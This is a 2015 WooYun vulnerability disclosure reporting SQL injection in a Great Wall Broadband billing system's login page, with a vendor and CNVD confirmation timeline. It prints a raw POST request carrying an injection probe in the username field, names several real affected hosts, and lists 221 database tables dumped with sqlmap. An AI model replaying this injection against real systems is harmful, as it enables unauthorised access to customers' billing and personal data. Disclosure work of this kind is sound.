当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0129684

漏洞标题:长城宽带某计费系统通用存在POST注入漏洞(影响多个案例)

相关厂商:长城宽带

漏洞作者: 路人甲

提交时间:2015-08-10 09:39

修复时间:2015-11-09 14:32

公开时间:2015-11-09 14:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:17

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-08-10: 细节已通知厂商并且等待厂商处理中
2015-08-11: 厂商已经确认,细节仅向厂商公开
2015-08-14: 细节向第三方安全合作伙伴开放
2015-10-05: 细节向核心白帽子及相关领域专家公开
2015-10-15: 细节向普通白帽子公开
2015-10-25: 细节向实习白帽子公开
2015-11-09: 细节向公众公开

简要描述:

长城宽带某计费系统通用存在POST注入漏洞(影响多个案例)

详细说明:

在家要弄宽带就百度了下当地的,发现一个长城宽带。
然后就发现了下面的事情,长城宽带计费系统,发现POST注入,然后百度了下关键字
长城宽带计费系统登陆,发现了各地好多,长城宽带计费全国各地代理通用系统

漏洞证明:

搜狗截图15年07月27日1430_22.png




POST /login.aspx HTTP/1.1
Host: help.szgwbn.net.cn
Content-Length: 495
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://help.szgwbn.net.cn
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: http://help.szgwbn.net.cn/login.aspx
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: Hm_lvt_11333d608f68408aeae2d69bbb4b361f=1437969558; Hm_lpvt_11333d608f68408aeae2d69bbb4b361f=1437969559; ASP.NET_SessionId=5r2poe55ynr1dmi5fg0vobab; CheckCode=04NJH
__VIEWSTATE=%2FwEPDwUKMTUwMDAxOTQ3Ng9kFgICAQ9kFgICCQ8PFgQeBFRleHQFceacjeWKoeWZqOaXoOazleWkhOeQhuivt%2BaxguOAgiAtLS0%2BIOWtl%2BespuS4siAnYWRtaW4nJyDlkI7nmoTlvJXlj7fkuI3lrozmlbTjgIIKJ2FkbWluJycg6ZmE6L%2BR5pyJ6K%2Bt5rOV6ZSZ6K%2Bv44CCHgdWaXNpYmxlZ2RkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQVidG5xZNkj0%2F5ZT01ReHK2HFMynZIeiiIr&__EVENTVALIDATION=%2FwEWBQK4nrW%2BAwLHvZLYDQK8963WBQL944T5DwKMk7GmBBZRR4zuYuWw50BgvO0NfXbyoaMu&tbUid=admin%27&tbPasswd=aaaa&tbCheckCode=04njh&btnqd.x=21&btnqd.y=0

sqlmap.png




sbssbsbsb.png




http://bill.szgwbn.net.cn/
http://help.szgwbn.net.cn/
http://alipay.gwbnsd.com
http://zfw.xmgwbn.com/

暂举全国各地的4个案例。主要是影响有点大,可以看到所有的长城宽带用户的套餐以及各种信息。

搜狗截图15年07月27日1336_17.png

xinxi1.png

搜狗截图15年07月27日1223_5.png

搜狗截图15年07月27日1304_9.png

搜狗截图15年07月27日1303_7.png

搜狗截图15年07月27日1304_8.png

[221 tables]
+---------------------------------------+
| A                                     |
| A1                                    |
| A2                                    |
| A3                                    |
| AA                                    |
| AA1                                   |
| AA12                                  |
| AAQ                                   |
| A_Blishi                              |
| AccountItemList                       |
| Account_Business                      |
| Account_Business_View                 |
| Account_Businessbak                   |
| Account_Example                       |
| Account_Example2010                   |
| Account_Examplebak                    |
| AcctTicket                            |
| AcctTicket20090422                    |
| AcctTicketbak                         |
| AcctionTypeTable                      |
| AliasList                             |
| AllCommunityIncome                    |
| AllTicket                             |
| AppointmentList                       |
| AreaList                              |
| AreaSheQuTable                        |
| AreaSheQuTablebak                     |
| Auditing                              |
| Bank                                  |
| BankFee                               |
| BankFeeLog                            |
| BankProtocal                          |
| BankProtocalDetail                    |
| BankProtocalLog                       |
| BindModeList                          |
| BmdBmuTable                           |
| BmdList                               |
| BmuAreaTable                          |
| BmuBusinessTable                      |
| BmuBusinessView                       |
| BmuList                               |
| BossLog                               |
| BossLogRsCmdView                      |
| BossLogView                           |
| BossLogbak                            |
| BrandList                             |
| BusinessClassList                     |
| BusinessList                          |
| BusinessType                          |
| CRMList                               |
| CRM_View                              |
| Card                                  |
| Cardbak                               |
| ChargingUnitTypeList                  |
| ChargingValuatePolicyList             |
| CheckStateList                        |
| CommunityList                         |
| CommunityListbak                      |
| CommunityMachineRoomTable             |
| ConcessionPolicyList                  |
| ConcessionSessionList                 |
| CreditList                            |
| CustomerCRMAttribute                  |
| CustomerCRMAttributeList              |
| CustomerCRMAttributeManageDomainTable |
| CustomerCRMAttributeTable             |
| CustomerList                          |
| CustomerListbak20150713               |
| CustomerType                          |
| DM                                    |
| DataDict                              |
| Day_AddUser                           |
| Day_AddUser2                          |
| DevelopmenTypeList                    |
| DocCatalog                            |
| DocumentDetail                        |
| DocumentList                          |
| DocumentLog                           |
| Dw_Dim_AccountItem                    |
| Dw_Dim_AccountState                   |
| Dw_Dim_Brand                          |
| Dw_Dim_Community                      |
| Dw_Dim_Customer                       |
| Dw_Dim_DevelopmenType                 |
| Dw_Dim_DevelopmentState               |
| Dw_Dim_Package                        |
| Dw_Dim_PaymentType                    |
| Dw_Dim_Product                        |
| Dw_Dim_UserServiceState               |
| Dw_Dim_UserType                       |
| Dw_Fact_AccountAccruals               |
| Dw_Fact_AccountBusiness               |
| Dw_Fact_Bosslog                       |
| Dw_Fact_SalePackageLog                |
| Dw_Fact_User                          |
| DynPropertySupportList                |
| EfectiveStateType                     |
| EffectiveStateCount                   |
| EngineCaseList                        |
| Falseusefeemingxi                     |
| FeeApportionView                      |
| FunctionInverseParam                  |
| FunctionList                          |
| FunctionPositiveParam                 |
| FunctionType                          |
| IPTV_EquipmentList                    |
| IPTV_EquipmentLog                     |
| IPTV_EquipmentTypeList                |
| IPTV_EquipmentUseLog                  |
| IPTV_PackageRights                    |
| IPTV_ProviderList                     |
| IPTV_TerminalCount                    |
| IPTV_TerminalList                     |
| IPTV_Userlog                          |
| InvoiceList                           |
| JTJYEffectiveStateCount               |
| JTJYPresents                          |
| JTJYRMBRadiusMoneyTable               |
| JTJYSalePackageSituation              |
| LossReasonType                        |
| MachineList                           |
| MeteringPeriodList                    |
| OperateLog                            |
| Operation                             |
| OperatorRoleTable                     |
| PackageSatisticsList                  |
| PaymentTypeList                       |
| PolicyCombinationTable                |
| PolicyList                            |
| PolicySessionList                     |
| PrepaidBalance                        |
| PresentList                           |
| PresentListbak                        |
| PrintJobList                          |
| ProductAttrList                       |
| ProductAttrTable                      |
| ProductCommunityTable                 |
| ProductList                           |
| ProductRadiusAttrTable                |
| ProjectList                           |
| Quanzemingxi                          |
| RMBRadiusMoneyTable                   |
| RechargeCardList                      |
| RoleBusinessTable                     |
| RoleBusinessView                      |
| RoleList                              |
| RootAccountList                       |
| RsCmdList                             |
| RsCmdListbak                          |
| SalePackageLog                        |
| SalePackageLogbak                     |
| SaleTypeList                          |
| ServiceHallBmdTable                   |
| ServiceHallBmdTablebak                |
| ServiceHallList                       |
| ServiceHallListbak                    |
| ServiceState                          |
| ServicehallDQTable                    |
| StoredProcedureList                   |
| TimeConcession_Day                    |
| TimePolicyList                        |
| UnitTypeList                          |
| UserBackFeeBill                       |
| UserBill                              |
| UserLinkInfo                          |
| UserList                              |
| UserPriceAdjustment                   |
| UserProductCustomizeAttrTable         |
| UserProductCustomizeAttrTablebak      |
| VBossLog                              |
| VBossLog2                             |
| VBossLog_SMS                          |
| VSalePackageLog2                      |
| V_AccountExample                      |
| V_Account_Business                    |
| V_Account_Example                     |
| V_CommunityList                       |
| V_CustomerBirth                       |
| V_Customer_PriceAdjust                |
| V_Customer_User                       |
| V_Customer_User_SMS                   |
| V_Customer_User_Test                  |
| V_Customers                           |
| V_UserLocation_Test                   |
| ValuateList                           |
| VlanList                              |
| bosslogbei140113                      |
| cardbak12                             |
| dtproperties                          |
| shequlist                             |
| sqlmapoutput                          |
| sys_user                              |
| sysdiagrams                           |
| uselistbak                            |
| vAllUser                              |
| vBA_Business                          |
| vBA_BusinessAccount                   |
| vBA_BusinessCustomer                  |
| vBA_BusinessCustomerInfo              |
| vBA_BusinessDocument                  |
| vBA_BusinessLog                       |
| vBA_BusinessSale                      |
| vBA_DevisionOfWorks                   |
| vBA_RootAccountList                   |
| vBankFee                              |
| vBankProtocal                         |
| vBridge_BossLog                       |
| vBridge_ReminderFee                   |
| vCustomerUserList                     |
| vInvoiceList                          |
| vPolicyList                           |
| vProductFeePeriod                     |
| vProductSet                           |
| vProduct_MeteringPeriod               |
| vReceiptList                          |
| vSalePackageLog                       |
| vSalePackageLog2_base                 |
| vUserAccount                          |
| vsys_user                             |
| xufeiList                             |
| yuyue                                 |
+---------------------------------------+

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-11 14:30

厂商回复:

CNVD确认所述情况,已经由CNVD通过网站公开联系方式(或以往建立的处置渠道)向网站管理单位(软件生产厂商)通报。

最新状态:

暂无

漏洞评价:

评论